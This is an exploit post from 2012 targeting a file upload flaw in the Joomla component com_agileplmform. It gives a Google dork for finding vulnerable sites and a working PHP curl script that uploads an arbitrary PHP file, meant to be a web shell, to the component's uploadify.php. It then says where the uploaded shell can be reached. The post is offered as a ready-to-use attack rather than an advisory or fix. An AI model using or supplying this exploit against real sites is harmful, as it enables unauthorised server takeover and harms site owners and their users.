+----------------------------------------------------------------------+ # Exploit Title: joomla component com_agileplmform file upload vulnerability # Google Dork: inurl:components/com_agileplmform # Date: 04/08/2012 # Author: Tunisian spl01t3r ____ (_) ____ ___ ( _ \| |( _ \ / _ \ | | | | || | | x |_| | ||_/|_|| ||_/ \___/ |_| |_| _ (_) ____ ____ ____ _____ | | / __| / __| \__ \ / ` \ | | \___ \ \___ \ / _ \_ | Y Y \ |_| |____/ |____/ (___ / |_|_| / \/ \/ +----------------------------------------------------------------------+ [+] exploit <?php /* example of using $uploadfile="C:\AppServ\www\Tunisia.php"; */ $uploadfile="C:\AppServ\www\b.php"; $ch = curl_init("http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>'/components/com_agileplmform/views/agileplmform/js/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> [+] how TO use Tunisia.php must be the devil file 3:) !!!shell!!! TN> http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/ Filename : $postResult output +----------------------------------------------------------------------+ [+] greetz to : BIbou sfaxien ; mech lazem ; tn_scorpion ; anas laaribi ; jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;) daly azrail ; med bradai ; 7rouz ; ghazy info ; mohamed bel ; hassen ben mbarek ; prince bibou ; hag whag ; anis van toets & all tn_spl01t3r's freinds mAhna mAhna [+] profile : www.facebook.com/TN.spl0it3r +----------------------------------------------------------------------+